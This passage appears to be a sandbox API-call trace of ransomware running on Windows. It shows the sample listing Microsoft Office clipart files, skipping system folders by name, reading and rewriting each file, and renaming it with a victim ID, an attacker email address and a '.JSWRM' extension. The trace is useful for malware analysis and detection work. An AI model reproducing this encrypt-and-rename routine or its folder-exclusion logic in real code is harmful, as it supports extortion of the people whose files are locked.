[0098.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0098.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0098.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0098.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0098.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.451] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0098.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.453] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00882_.WMF", cAlternateFileName="")) returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2=".") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="..") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="...") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="windows") returned -1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="recovery") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="perflogs") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="documents and settings") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="system volume information") returned -1 [0098.453] lstrcmpiW (lpString1="SY00882_.WMF", lpString2="msocache") returned 1 [0098.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0098.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00882_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00882_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00882_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0098.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0098.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00882_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00882_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00882_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0098.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0098.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00882_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00882_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.455] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2480) returned 1 [0098.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9b0) returned 0x20c6c0 [0098.455] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0098.457] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.457] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0098.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.457] CloseHandle (hObject=0x314) returned 1 [0098.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0098.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0098.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0098.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0098.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0098.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00882_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00882_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00882_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00882_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0098.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.459] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01006_.WMF", cAlternateFileName="")) returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2=".") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="..") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="...") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="windows") returned -1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="recovery") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="perflogs") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="documents and settings") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="system volume information") returned -1 [0098.459] lstrcmpiW (lpString1="SY01006_.WMF", lpString2="msocache") returned 1 [0098.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0098.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01006_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0098.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0098.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01006_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0098.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0098.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.460] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1588) returned 1 [0098.460] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x630) returned 0x2332c0 [0098.460] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x630, lpOverlapped=0x0) returned 1 [0098.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.461] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x630, lpOverlapped=0x0) returned 1 [0098.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0098.462] CloseHandle (hObject=0x314) returned 1 [0098.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0098.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0098.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0098.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0098.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0098.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01006_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01006_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01006_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0098.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0098.463] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2734, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01252_.WMF", cAlternateFileName="")) returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2=".") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="..") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="...") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="windows") returned -1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="recovery") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="perflogs") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="documents and settings") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="system volume information") returned -1 [0098.463] lstrcmpiW (lpString1="SY01252_.WMF", lpString2="msocache") returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01252_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01252_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01252_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0098.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01252_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01252_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01252_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0098.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.464] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10036) returned 1 [0098.464] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2730) returned 0x24d210 [0098.464] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2730, lpOverlapped=0x0) returned 1 [0098.466] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.466] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2730, lpOverlapped=0x0) returned 1 [0098.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.466] CloseHandle (hObject=0x314) returned 1 [0098.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0098.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0098.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0098.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0098.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01252_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01252_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01252_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0098.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.468] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1113bba3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01253_.WMF", cAlternateFileName="")) returned 1 [0098.468] 